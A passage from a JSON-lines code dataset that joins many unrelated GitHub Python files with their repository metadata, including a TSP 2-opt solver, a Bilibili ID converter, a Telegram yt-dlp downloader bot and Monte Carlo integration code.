避免python全局解释器锁带来的计算瓶颈\n\n# 要创建第二个进程,最简单的方法就是用一个目标函数实例化一个proess对象,并调用start()让他开始工作\n\nimport multiprocessing\n\n\ndef worker():\n print('worker')\n return\n\n\njobs = []\n\nfor i in range(5):\n p = multiprocessing.Process(target=worker)\n jobs.append(p)\n p.start()\n\n# 不过不能清楚知道哪一个进程先输出,这取决于具体的执行顺序,因为每个进程都在竞争访问输出流\n","repo_name":"bingle-123/python","sub_path":"python/tech/python_example/thread/multiprocessing1.py","file_name":"multiprocessing1.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39768030289","text":"from ast import While\nfrom openpyxl import load_workbook\nimport pandas as pd\nimport numpy as np\nimport random\nimport itertools as iter\nimport time\nimport math\nimport os \n\npath_file = os.getcwd() + '\\Sujet-Données\\Instance.xlsx'\n\nwb = load_workbook(path_file)\nws = wb[\"Feuil1\"]\nn=0\n\nwhile ws.cell(n+2,1).value is not None : \n n=n+1\n\ndist=np.zeros([n,n], dtype=float)\ncox=np.zeros(n,dtype=float)\ncoy=np.zeros(n,dtype=float)\nalpha=np.zeros(n, dtype=float)\na = np.zeros(n, dtype = float)\nb = np.zeros(n, dtype = float)\n\n\n#lire les distances dans la matrice dist\n\nfor i in range(n):\n\n cox[i]=ws.cell(2+i,2).value\n coy[i]=ws.cell(2+i,3).value\n alpha[i] = ws.cell(2+i,6).value\n a[i] = ws.cell(2+i,4).value\n b[i] = ws.cell(2+i,5).value\n \n\nfor i in range(n):\n for j in range(n):\n dist[i,j]=math.sqrt((cox[i]-cox[j])**2+(coy[i]-coy[j])**2)\n\n\n\ndef two_opt(route):\n\n amelioration = True \n while amelioration == True:\n amelioration = False\n\n for i in range(1,len(route)-2):\n for j in range(1,len(route)-2):\n if j != i-1 and j != i and j != i+1:\n\n if dist[route[i], route[i+1]] + dist[route[j], route[j+1]] > dist[route[i], route[j]] + dist[route[i+1], route[j+1]]:\n temp1 = route[i+1]\n temp2 = route[j]\n route[i+1]=temp2\n route[j]=temp1\n route[i+2:j] = list(reversed(route[i+2:j]))\n\n amelioration = True\n print(\"2opt\", route)\n return route\n\n\n\ndef two_opt_TW(route):\n\n amelioration = True \n while amelioration == True:\n amelioration = False\n\n for i in range(1,len(route)-2):\n for j in range(1,len(route)-2):\n if j != i-1 and j != i and j != i+1:\n \n route_TW = np.zeros(len(route), dtype = int)\n for k in range(len(route)):\n route_TW[k] = route[k]\n\n route_TW[i+1] = route[j]\n route_TW[j] = route[i+1]\n route_TW[i+2:j] = list(reversed(route[i+2:j]))\n \n\n if coutsTW(route) > coutsTW(route_TW):\n route = route_TW\n\n amelioration = True\n print(\"2optTW\", route)\n return list(route)\n\n\n\n\nroute = [0, 12, 11, 8, 32, 39, 35, 31, 27, 29, 4, 13, 18, 37, 25, 17, 5, 15, 23, 36, 14, 7, 10, 34, 6, 22, 28, 38, 21, 20, 30, 16, 24, 33, 19, 2, 26, 9, 3, 1, 0]\n\n\n\ndef couts(route):\n\n cout = 0\n\n for i in range(len(route)-2):\n cout+= dist[route[i],route[i+1]]\n cout+= dist[route[n-1],0]\n return cout, len(route)\n\n\n\ndef coutsTW(route):\n\n cout = 0\n t = np.zeros(n, dtype = float)\n \n\n for i in range(len(route)-1):\n\n cout+=dist[route[i], route[i+1]]\n\n t[route[i+1]] = t[route[i]] + dist[route[i], route[i+1]]\n\n if t[route[i+1]] < a[route[i+1]]:\n t[route[i+1]] = a[route[i+1]]\n \n elif t[route[i+1]] > b[route[i+1]]:\n cout += (alpha[route[i+1]])*(t[route[i+1]]-b[route[i+1]])\n\n\n cout += dist[route[len(route)-1],0]\n return cout\n\n\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nglobal pos\npos={}\n\nfor i in range(n):\n pos[i]=np.array([cox[i],coy[i]])\n\n\n\ndef graphique(route):\n g=nx.Graph()\n g.add_nodes_from({i for i in range(n)})\n for i in range(len(route)-1):\n g.add_edges_from({(route[i],route[i+1])})\n plt.figure(figsize=(10,10))\n nx.draw_networkx(g,pos)\n plt.title('meilleure solution')\n plt.show()\n\ngraphique(route)\ngraphique(two_opt(route))","repo_name":"SimonBayl/Combinatorial-optimization-TSPTW-VRPTW-","sub_path":"Scripts/(V)2-opt.py","file_name":"(V)2-opt.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"2910398026","text":"#!/usr/bin/env python3\n\nimport signal\nimport threading\nimport readline\nfrom cmd import Cmd\nimport d2agent\n\n\nclass Shell(Cmd):\n agent = {}\n prompt = \"d2agent> \"\n intro = \" _____ \\n\"\n intro = intro + \" / ____| \\n\"\n intro = intro + \"| (___ _ _ ___ __ _ _ __ _____ __\\n\"\n intro = intro + \" \\\\___ \\\\| | | / __|/ _` | '_ \\\\ / _ \\\\ \\\\ /\\\\ / /\\n\"\n intro = intro + \" ____) | |_| \\\\__ \\\\ (_| | | | | (_) \\\\ V V / \\n\"\n intro = intro + \"|_____/ \\\\__,_|___/\\\\__,_|_| |_|\\\\___/ \\\\_/\\\\_/ \\n\"\n\n def __init__(self, ag):\n self.agent = ag\n Cmd.__init__(self)\n def emptyline(self): pass\n def do_quit(self, arg): self.agent.cmd_quit()\n def do_vnf(self, arg): self.agent.cmd_vnf(arg)\n def do_nfvi(self, arg): self.agent.cmd_nfvi(arg)\n def do_thrd(self, arg): self.agent.cmd_thrd(arg)\n def do_sys(self, arg): self.agent.cmd_sys(arg)\n\n\n\ndef main():\n def cb_sigint(num, frame): pass\n signal.signal(signal.SIGINT, cb_sigint)\n\n agent = d2agent.d2agent()\n agent.background_d2monitor = background_d2monitor\n agent.nfvi_add('nfvi0', 'labnet5.dpdk.ninja', 8888)\n agent.vnf_add('vnf0', 'nfvi0')\n agent.vnf_add('vnf1', 'nfvi0')\n # agent.vnf_d2mon('vnf0', 'on')\n\n shell = threading.Thread(target=Shell(agent).cmdloop, name='shell')\n shell.start()\n\n\n\ndef background_d2monitor(d2vnfobj, agent):\n import time\n import math\n import susanow.d2 as d2\n from d2agent import ts\n from d2agent import cast\n from d2agent import myThread\n assert(isinstance(d2vnfobj , d2agent.d2vnf ))\n assert(isinstance(agent , d2agent.d2agent))\n ssn_nfvi = d2vnfobj.nfvi.cast2ssn()\n ssn_vnf = ssn_nfvi.get_vnf(d2vnfobj.name)\n if (ssn_vnf == None):\n print('vnf not found')\n return\n\n seeds = []\n\n f = open('/tmp/ssn_d2log.log', 'a')\n f.write('[{}] {} start d2 monitoring\\n'.format(ts(), ssn_vnf.name()))\n f.flush()\n\n while True:\n cur_thrd = threading.current_thread()\n cast(myThread, cur_thrd)\n if (cur_thrd.running_flag == False): break\n\n ssn_vnf.sync()\n n_core = ssn_vnf.n_core()\n rxrate = ssn_vnf.rxrate()\n perf = math.floor(ssn_vnf.perfred() * 100)\n perf = 100 if (perf>100) else perf\n\n max_rate = 17000000\n if (perf < 90):\n f.write('[{}] {} d2out\\n'.format(ts(), ssn_vnf.name()))\n f.flush()\n d2.d2out(ssn_vnf, ssn_nfvi)\n else:\n if (n_core == 1): pass\n elif (n_core == 2):\n if (perf > 85):\n if (rxrate < (max_rate*0.3)):\n f.write('[{}] {} d2in pattern2\\n'\n .format(ts(), ssn_vnf.name()))\n f.flush()\n d2.d2in(ssn_vnf, ssn_nfvi)\n elif (n_core == 4):\n if (perf > 85):\n if (rxrate < (max_rate*0.6)):\n f.write('[{}] {} d2in pattern1\\n'\n .format(ts(), ssn_vnf.name()))\n f.flush()\n d2.d2in(ssn_vnf, ssn_nfvi)\n seed = { ssn_vnf.rxrate(), ssn_vnf.perfred(), ssn_vnf.n_core()}\n seeds.append(seed)\n time.sleep(0.5)\n\n f.write('[{}] finish d2 monitoring\\n'.format(ts()))\n f.flush()\n f.close()\n return\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"susanow/d2agent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40222976567","text":"# -*- coding: utf-8 -*-\n\nimport threading\nfrom poco.drivers.std import StdPoco\nfrom poco.utils.device import VirtualDevice\nfrom poco.drivers.std import DEFAULT_ADDR, DEFAULT_PORT\nfrom poco.utils.simplerpc.utils import sync_wrapper\n\n\nclass OSXPoco(StdPoco):\n\n def __init__(self, selector=None, addr=DEFAULT_ADDR, **options):\n if 'action_interval' not in options:\n options['action_interval'] = 0.5\n\n if addr[0] == \"localhost\" or addr[0] == \"127.0.0.1\":\n from poco.drivers.osx.sdk.OSXUI import PocoSDKOSX\n sdk = PocoSDKOSX(addr)\n self.SDKProcess = threading.Thread(target=sdk.run) # 创建线程\n self.SDKProcess.setDaemon(True)\n self.SDKProcess.start()\n\n dev = VirtualDevice(addr[0])\n super(OSXPoco, self).__init__(addr[1], dev, False, **options)\n \n self.selector = selector\n self.connect_window(self.selector)\n self.set_foreground()\n\n @sync_wrapper\n def connect_window(self, selector):\n return self.agent.rpc.call(\"ConnectWindow\", selector)\n\n @sync_wrapper\n def set_foreground(self):\n return self.agent.rpc.call(\"SetForeground\")\n","repo_name":"adolli/Poco","sub_path":"poco/drivers/osx/osxui_poco.py","file_name":"osxui_poco.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"28426702491","text":"#\"\"\"import time\n#st1=\"core python\"\n#str2=\"\"\"advance python\"\"\"\n#str3='django framwork'\n#print(st1)\n#print(str2)\n#print(str3)\n#time.sleep(1)\n#print(\"end of an application\")\"\"\"\n\"\"\"import time\nstr1=\"core python\"\nprint(str1[0])\nprint(str1[1])\nprint(str1[2])\"\"\"\nimport time\nstr1=\"core python\"\nprint(str1[2::])\ntime.sleep(1)\nprint(\"end of an application\")","repo_name":"shaiksayeed11/my-python-work","sub_path":"strdatatype.py","file_name":"strdatatype.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43168335463","text":"N, A, B = map(int, input().split())\n\np = 0\n\nfor _ in range(N):\n s, d = input().split()\n x = int(d)\n\n if x < A:\n x = A\n elif x > B:\n x = B\n\n if s == \"East\":\n p += x\n else:\n p -= x\n\nif p > 0:\n print(\"East\", p)\nelif p < 0:\n print(\"West\", abs(p))\nelse:\n print(0)\n","repo_name":"0x1feb/atcoder","sub_path":"abc/abc025/abc025_b.py","file_name":"abc025_b.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30833421158","text":"\"\"\"\nBuilds the repo by reading config and replacing placeholders.\n\"\"\"\nimport os\n\nfrom config import REPO_URL, REPO_NAME\n\nfor fname in [\"CONTRIBUTING.md\", \"README.md\", \"setup.py\"]:\n with open(fname, 'r', encoding='UTF-8') as f:\n text = f.read()\n text = text.replace(\"{repo_url}\", REPO_URL)\n text = text.replace(\"{repo_name}\", REPO_NAME)\n\n with open(fname, 'w', encoding='UTF-8') as f:\n f.write(text)\n\nos.makedirs(REPO_NAME, exist_ok=True) # Add your source files to this directory.\n","repo_name":"blengerich/BasicRepoPython","sub_path":"build_repo.py","file_name":"build_repo.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33091194654","text":"print('='*8,'Lista de Convidados','='*8)\nfrom module import interface\nfrom time import sleep\n\nlc = []\nwhile True:\n interface.menu('Menu Principal')\n op = interface.options('Adicionar convidados', 'Ver lista de convidados', 'Sair do Programa')\n if op == 1:\n while True:\n sleep(1)\n interface.titulo('Novo Convidado')\n lc.append(str(input('Nome do convidado: ')).strip().title())\n r = ' '\n while r not in 'SN':\n r = str(input('Deseja adicionar mais convidados? [S/N] ')).strip().upper()[0]\n if r in 'N':\n sleep(1)\n break\n elif op == 2:\n sleep(2)\n if len(lc) == 0:\n print('Sem convidados adicionados ainda.')\n else:\n lc.sort()\n interface.titulo('Lista de Convidados')\n for n in lc:\n print(f'{n}')\n sleep(1)\n elif op == 3:\n interface.menu('Saindo do Programa...')\n sleep(2)\n break\nprint('\\033[34mPrograma Finalizado!\\033[m')\n","repo_name":"Samuel-Melo890/Python-Desafios","sub_path":"ExerciciosPYTHON/NovPython/001.py","file_name":"001.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74164507969","text":"# Bilibili Bv Av 号码相互转换工具\n#\n# 算法部分代码来自:\n# https://www.zhihu.com/answer/1099438784\n\nimport time\nimport os\nimport sys\nimport platform\n\n\ndef av2bv():\n clear()\n print(\"\\n[*] ============= av to bv =============\\n\")\n print(\"[*] 输入av(纯数字),例如: 170001\\n 若输入 0 则返回上级\\n\")\n try:\n x = int(input(\"[+] 输入:\"))\n if x == 0:\n return 0\n x = (x ^ xor) + add\n r = list('BV1 4 1 7 ')\n for i in range(6):\n r[index_list[i]] = table[x // 58 ** i % 58]\n result = ''.join(r)\n except Exception as err:\n print(\"\\n[!] 出错\\n\", err)\n else:\n print(\"[+] 结果:\", result)\n input(\"\\n[+] 按 Enter 键继续……\")\n\n\ndef bv2av():\n clear()\n print(\"\\n[*] ============= bv to av =============\\n\")\n print(\"[*] 输入BV,例如: BV17x411w7KC\\n 若输入 0 则返回上级\\n\")\n x = input(\"[+] 输入:\")\n if x == \"0\":\n return 0\n try:\n r = 0\n for i in range(6):\n r += tr[x[index_list[i]]] * 58 ** i\n result = (r - add) ^ xor\n except Exception as err:\n print(\"\\n[!] 出错\\n\", err)\n else:\n print(\"[+] 结果:\", result)\n input(\"\\n[+] 按 Enter 键继续……\")\n\n\ndef clear():\n sysinfo = platform.platform()\n if \"indows\" in sysinfo:\n os.system(\"cls\")\n elif \"inux\" in sysinfo:\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n\n\ndef quit_(_info):\n print(_info)\n sys.exit()\n\n\ndef choose():\n while 1:\n print(\"\\n[*] ========== MENU ==========\\n\")\n print(\"[*] 1. Av 转 Bv\\n[*] 2. Bv 转 Av\\n[*] 0. 退出\")\n a = input(\"\\n[+] 选择:\")\n if a == \"1\":\n while 1:\n sig = av2bv()\n if sig == 0:\n break\n clear()\n elif a == \"2\":\n while 1:\n sig = bv2av()\n if sig == 0:\n break\n clear()\n elif a == \"0\":\n clear()\n break\n else:\n print(\"[#] 输入有误,请重新输入\")\n time.sleep(1.5)\n clear()\n\n\nif __name__ == '__main__':\n # 初始化生成 tr\n table = 'fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'\n tr = {}\n for i in range(58):\n tr[table[i]] = i\n xor = 177451812\n add = 8728348608\n index_list = [11, 10, 3, 8, 4, 6] # r列表中的索引号\n try:\n choose()\n except KeyboardInterrupt:\n quit_(\"\\n\\n[!] Raised KeyboardInterrupt! >>> Exiting……\")\n","repo_name":"hui-shao/python-toolkit","sub_path":"Bilibili/bv-av/av-bv-converter.py","file_name":"av-bv-converter.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"8998712682","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom .. import utils, lookups\n\ndef run_controlled_reversal_mismatch_traces(meta, pref_tensor, filter_licking=None, filter_running=None,\n filter_hmm_engaged=True, force_same_day_reversal=False,\n use_stages_for_reversal=False, skew_stages_for_reversal=True,\n boot=False):\n \"\"\"\n Calculate a mismatch binning running and calculating between matched bins, then averaging across bins\n\n :param meta:\n :param pref_tensor:\n :param filter_running:\n :param filter_licking:\n :param filter_hmm_engaged:\n :param force_same_day_reversal:\n :return:\n reversal_mismatch\n \"\"\"\n\n # get mouse from metadata\n mouse = meta.reset_index()['mouse'].unique()[0]\n\n # mean_t_tensor = utils.tensor_mean_per_trial(meta, pref_tensor, nan_licking=False, account_for_offset=True)\n\n # get day of reversal\n if force_same_day_reversal:\n post_rev = meta.reset_index()['date'].mod(1).isin([0.5]).values\n if np.sum(post_rev) == 0:\n out = np.zeros(pref_tensor.shape[0])\n out[:] = np.nan\n print(f'Mouse {mouse} did not have single-day reversal.')\n return out\n rev_date = meta.reset_index().loc[post_rev, 'date'].unique()[0] - 0.5\n pre_rev = meta.reset_index()['date'].isin([rev_date]).values\n elif use_stages_for_reversal:\n assert 'parsed_11stage' in meta.columns\n pre_rev = meta.parsed_11stage.isin(['L5 learning']).values\n post_rev = meta.parsed_11stage.isin(['L1 reversal1']).values\n elif skew_stages_for_reversal:\n pre_rev = meta.parsed_11stage.isin(['L5 learning']).values\n rev_vec = meta.reset_index()['learning_state'].isin(['reversal1']).values\n if all(~rev_vec):\n out = np.zeros(pref_tensor.shape[0])\n out[:] = np.nan\n print(f'Mouse {mouse} did not have any reversal.')\n if boot:\n return out, out\n return out\n post_rev_date = meta.reset_index().loc[rev_vec, 'date'].iloc[0]\n post_rev = meta.reset_index()['date'].isin([post_rev_date]).values\n post_rev[np.where(post_rev)[0][100:]] = False\n else:\n learning_vec = meta.reset_index()['learning_state'].isin(['learning']).values\n rev_date = meta.reset_index().loc[learning_vec, 'date'].iloc[-1]\n pre_rev = meta.reset_index()['date'].isin([rev_date]).values\n rev_vec = meta.reset_index()['learning_state'].isin(['reversal1']).values\n if all(~rev_vec):\n out = np.zeros(pref_tensor.shape[0])\n out[:] = np.nan\n print(f'Mouse {mouse} did not have any reversal.')\n return out\n post_rev_date = meta.reset_index().loc[rev_vec, 'date'].iloc[0]\n post_rev = meta.reset_index()['date'].isin([post_rev_date]).values\n print(f'{mouse}: pre-rev: {np.sum(pre_rev)}, post-rev: {np.sum(post_rev)}')\n rev_day = (pre_rev | post_rev)\n\n # filter to include fixed running type: low or high\n if filter_running is not None:\n speed_cm_s = meta.speed.values\n if filter_running == 'low_speed_only':\n rev_day = rev_day & (speed_cm_s <= 6) # was 4\n print('WARNING low_speed_only set to 6 cm/s')\n elif filter_running == 'high_speed_only':\n rev_day = rev_day & (speed_cm_s > 20) # was 10\n print('WARNING high_speed_only set to 20 cm/s')\n else:\n raise NotImplementedError\n\n # filter to include fixed licking type: low or high\n if filter_licking is not None:\n # TODO this needs accounting for offset licking for offset cells\n # TODO could also do a grid of lick and run bins to make comparisons\n mean_lick_rate = meta.anticipatory_licks.values / lookups.stim_length[mouse]\n if filter_licking == 'low_lick_only':\n rev_day = rev_day & (mean_lick_rate <= 1.7)\n elif filter_licking == 'high_lick_only':\n rev_day = rev_day & (mean_lick_rate > 1.7)\n else:\n raise NotImplementedError\n\n # animal must be engaged in the task (or naive when it can't \"engage\")\n if filter_hmm_engaged:\n rev_day = rev_day & (meta.hmm_engaged.values | meta.learning_state.isin(['naive']).values)\n\n print(f' --> {mouse}: pre-rev: {np.sum(pre_rev & rev_day)}, post-rev: {np.sum(post_rev & rev_day)}')\n\n # calculate mean for preferred cue for each cell across reversal\n pre_bins = utils.bin_running_traces_calc(meta, pref_tensor, (rev_day & pre_rev))\n post_bins = utils.bin_running_traces_calc(meta, pref_tensor, (rev_day & post_rev))\n # TODO may want to NOT do this across running always so you can get a trace with SEM error bars\n\n pre_sem = np.nanstd(pref_tensor[:, :, (rev_day & pre_rev)], axis=2) \\\n / np.sqrt(np.sum(~np.isnan(pref_tensor[:, :, (rev_day & pre_rev)]), axis=2))\n post_sem = np.nanstd(pref_tensor[:, :, (rev_day & post_rev)], axis=2) \\\n / np.sqrt(np.sum(~np.isnan(pref_tensor[:, :, (rev_day & post_rev)]), axis=2))\n simple_pre_mean = np.nanmean(pref_tensor[:, :, (rev_day & pre_rev)], axis=2)\n simple_post_mean = np.nanmean(pref_tensor[:, :, (rev_day & post_rev)], axis=2)\n reversal_mismatch = np.nanmean(post_bins - pre_bins, axis=2)\n pre_collapse_bins = np.nanmean(pre_bins, axis=2)\n post_collapse_bins = np.nanmean(post_bins, axis=2)\n\n return [reversal_mismatch, pre_collapse_bins, post_collapse_bins,\n pre_sem, post_sem, simple_pre_mean, simple_post_mean]","repo_name":"klmcguir/cascade","sub_path":"cascade/plotting/mismatch.py","file_name":"mismatch.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29083226580","text":"import logging\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nLOGGER = logging.getLogger(__name__)\n\nimport asyncio\nimport json\nimport math\nimport os\nimport shutil\nimport time\nfrom datetime import datetime\n\nfrom apdbot import (\n DOWNLOAD_LOC,\n AUTH\n)\n\nimport pyrogram\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\nfrom apdbot.helpers.upload_to_tg import upload_to_tg\n\n\nasync def ytdl_callback(bot, update):\n #LOGGER.info(update)\n cb_data = update.data\n # youtube_dl extractors\n tg_send_type, youtube_dl_format, youtube_dl_ext = cb_data.split(\"|\")\n #\n current_user_id = update.message.reply_to_message.from_user.id\n current_touched_user_id = update.from_user.id\n if current_user_id != current_touched_user_id:\n await bot.answer_callback_query(\n callback_query_id=update.id,\n text=\"Your are not the Right Person ­Ъцћ\",\n show_alert=True,\n cache_time=0\n )\n return False, None\n user_working_dir = os.path.join(DOWNLOAD_LOC, str(current_user_id))\n # create download directory, if not exist\n if not os.path.isdir(user_working_dir):\n await bot.delete_messages(\n chat_id=update.message.chat.id,\n message_ids=[\n update.message.message_id,\n update.message.reply_to_message.message_id,\n ],\n revoke=True\n )\n return\n save_ytdl_json_path = user_working_dir + \\\n \"/\" + str(\"ytdleech\") + \".json\"\n try:\n with open(save_ytdl_json_path, \"r\", encoding=\"utf8\") as f:\n response_json = json.load(f)\n os.remove(save_ytdl_json_path)\n except (FileNotFoundError) as e:\n await bot.delete_messages(\n chat_id=update.message.chat.id,\n message_ids=[\n update.message.message_id,\n update.message.reply_to_message.message_id,\n ],\n revoke=True\n )\n return False\n #\n response_json = response_json[0]\n # TODO: temporary limitations\n # LOGGER.info(response_json)\n #\n youtube_dl_url = response_json.get(\"webpage_url\")\n LOGGER.info(youtube_dl_url)\n #\n custom_file_name = \"%(title)s.%(ext)s\"\n # https://superuser.com/a/994060\n LOGGER.info(custom_file_name)\n #\n await update.message.edit_caption(\n caption=\"`Trying to Download...`\"\n )\n description = \"@APDLeechBox\"\n if \"fulltitle\" in response_json:\n description = response_json[\"fulltitle\"][0:1021]\n # escape Markdown and special characters\n #\n tmp_directory_for_each_user = os.path.join(\n DOWNLOAD_LOC,\n str(update.message.message_id)\n )\n if not os.path.isdir(tmp_directory_for_each_user):\n os.makedirs(tmp_directory_for_each_user)\n download_directory = tmp_directory_for_each_user\n download_directory = os.path.join(tmp_directory_for_each_user, custom_file_name)\n command_to_exec = []\n if tg_send_type == \"audio\":\n command_to_exec = [\n \"yt-dlp\",\n \"-c\",\n \"--prefer-ffmpeg\",\n \"--extract-audio\",\n \"--audio-format\", youtube_dl_ext,\n \"--audio-quality\", youtube_dl_format,\n youtube_dl_url,\n \"-o\", download_directory,\n # \"--external-downloader\", \"aria2c\"\n ]\n else:\n # command_to_exec = [\"youtube-dl\", \"-f\", youtube_dl_format, \"--hls-prefer-ffmpeg\", \"--recode-video\", \"mp4\", \"-k\", youtube_dl_url, \"-o\", download_directory]\n minus_f_format = youtube_dl_format\n if \"youtu\" in youtube_dl_url:\n for for_mat in response_json[\"formats\"]:\n format_id = for_mat.get(\"format_id\")\n if format_id == youtube_dl_format:\n acodec = for_mat.get(\"acodec\")\n vcodec = for_mat.get(\"vcodec\")\n if acodec == \"none\" or vcodec == \"none\":\n minus_f_format = youtube_dl_format + \"+bestaudio\"\n break\n command_to_exec = [\n \"yt-dlp\",\n \"-c\", \"--all-subs\", \"--write-sub\",\n \"--embed-subs\",\n \"-f\", minus_f_format,\n \"--hls-prefer-ffmpeg\", youtube_dl_url,\n \"-o\", download_directory,\n # \"--external-downloader\", \"aria2c\"\n ]\n #\n command_to_exec.append(\"--no-warnings\")\n # command_to_exec.append(\"--quiet\")\n command_to_exec.append(\"--restrict-filenames\")\n #\n if \"hotstar\" or \"m3u8\" in youtube_dl_url:\n command_to_exec.append(\"--geo-bypass-country\")\n command_to_exec.append(\"IN\")\n LOGGER.info(command_to_exec)\n start = datetime.now()\n process = await asyncio.create_subprocess_exec(\n *command_to_exec,\n # stdout must a pipe to be accessible as process.stdout\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n # Wait for the subprocess to finish\n stdout, stderr = await process.communicate()\n e_response = stderr.decode().strip()\n t_response = stdout.decode().strip()\n # LOGGER.info(e_response)\n # LOGGER.info(t_response)\n ad_string_to_replace = \"`Try With Another Bot Again and Again./nIf Still Getting Errors ­Ъци Its Not Supported then.`\"\n if e_response and ad_string_to_replace in e_response:\n error_message = e_response.replace(ad_string_to_replace, \"\")\n await update.message.edit_caption(\n caption=error_message\n )\n return False, None\n if t_response:\n # LOGGER.info(t_response)\n # os.remove(save_ytdl_json_path)\n end_one = datetime.now()\n time_taken_for_download = (end_one - start).seconds\n dir_contents = len(os.listdir(tmp_directory_for_each_user))\n # dir_contents.sort()\n await update.message.edit_caption(\n caption=f\"Found {dir_contents} File.\\n\\nNow Uploading to Telegram be Patient...\\n\"\n )\n user_id = update.from_user.id\n #\n final_response = await upload_to_tg(\n update.message,\n tmp_directory_for_each_user,\n user_id,\n {},\n True\n )\n LOGGER.info(final_response)\n #\n try:\n shutil.rmtree(tmp_directory_for_each_user)\n except:\n pass\n #\n message_to_send = \"\"\n for key_f_res_se in final_response:\n local_file_name = key_f_res_se\n l_f_name = local_file_name.replace(\"_\", \" \")\n message_id = final_response[key_f_res_se]\n channel_id = str(update.message.chat.id)[4:]\n private_link = f\"https://t.me/c/{channel_id}/{message_id}\"\n message_to_send += \"­ЪЊЇ \"\n message_to_send += l_f_name\n message_to_send += \"\"\n message_to_send += \"\\n\"\n if message_to_send != \"\":\n mention_req_user = f\"Your Requested Files\\n\\n\"\n message_to_send = mention_req_user + message_to_send\n message_to_send = message_to_send + \"\\n\" + \"­ЪЈЁPOWERED BY : @APDLEECHBOX\\n#UPLOADED\"\n else:\n message_to_send = \"FAILED to Upload Files. ­Ъўъ­Ъўъ\"\n await update.message.reply_to_message.reply_text(\n text=message_to_send,\n quote=True,\n disable_web_page_preview=True\n )\n","repo_name":"Omkar47/AutoLeecher","sub_path":"apdbot/helpers/ytdl_button.py","file_name":"ytdl_button.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"43"} +{"seq_id":"16710649594","text":"import numpy as np\nfrom numpy import random\nfrom mpmath import *\n\nlower_limit = 0.0 # нижний предел интергрирования\nupper_limit = 4.0 # верхний предел интергрирования\n\nnumber_of_iterations = [100, 1000, 10000, 10000, 100000] # чило итераций\nnumber_of_experiments = 5 # число экспериментов для каждого числа итераций\n\nmonte_carlo_results = {} # результаты полученные при различном числе итераций методом Монте-Карло\nsymmetric_function_results = {} # результаты полученные при различном числе итераций симметризации\n# подынтегральной функции\n\n\ndef integrand_function(value): # вычисление подынтегральной функции\n return mpf(np.sin(value) / value)\n\n\n# вычисление симметрической подынтегральной функции\ndef symmetric_integrand_function(value, lower_limit_, upper_limit_):\n symmetric_value = lower_limit_ + upper_limit_ - value\n return mpf(mpf(1/2) * (mpf(np.sin(value) / value) + mpf(np.sin(symmetric_value) / symmetric_value)))\n\n\n# вычисление определенного интеграла простейшим методом Монте-Карло\ndef monte_carlo_and_symmetric_i_function_methods(results_m, results_s, iterations, experiments, lower_lim, upper_lim):\n for iter_number_counter in range(len(iterations)): # для каждого числа итераций проводим 5 экспериметов\n monte_carlo_experiments_results = [] # результаты пяти экспериметов для метода Монте-Карло\n symmetric_function_experiments_results = [] # результаты пяти экспериметов для метода симметризации\n # подынтегральной функции\n for experiment in range(experiments):\n integral_monte_carlo = mpf(0.0)\n integral_symmetric_function = mpf(0.0)\n for counter in range(iterations[iter_number_counter]):\n value = lower_lim + (upper_lim - lower_lim) * random.uniform() # произвольная случайная величина\n integral_monte_carlo += mpf(integrand_function(value))\n integral_symmetric_function += mpf(symmetric_integrand_function(value, lower_lim, upper_lim))\n monte_carlo_experiments_results.append((upper_lim - lower_lim) / mpf(float(iterations[iter_number_counter]))\n * integral_monte_carlo)\n symmetric_function_experiments_results.append((upper_lim - lower_lim) /\n mpf(float(iterations[iter_number_counter]))\n * integral_symmetric_function)\n results_m[iterations[iter_number_counter]] = monte_carlo_experiments_results\n results_s[iterations[iter_number_counter]] = symmetric_function_experiments_results\n print(results_m)\n print(results_s)\n\n\nmonte_carlo_and_symmetric_i_function_methods(monte_carlo_results, symmetric_function_results, number_of_iterations,\n number_of_experiments, lower_limit, upper_limit)\n\n","repo_name":"vetasavitskaya/famcs-simulation-and-statistical-modeling-labs","sub_path":"lab-02-monte_carlo_integration/lab-02-monte_carlo_integration.py","file_name":"lab-02-monte_carlo_integration.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2134107059","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n\nurl= 'https://www.globo.com/?utm_source=barraGCOM'\nresponse= requests.get(url)\nhtml= BeautifulSoup(response.text, 'html.parser')\n\n\nfor texto in html.select('.headline__container 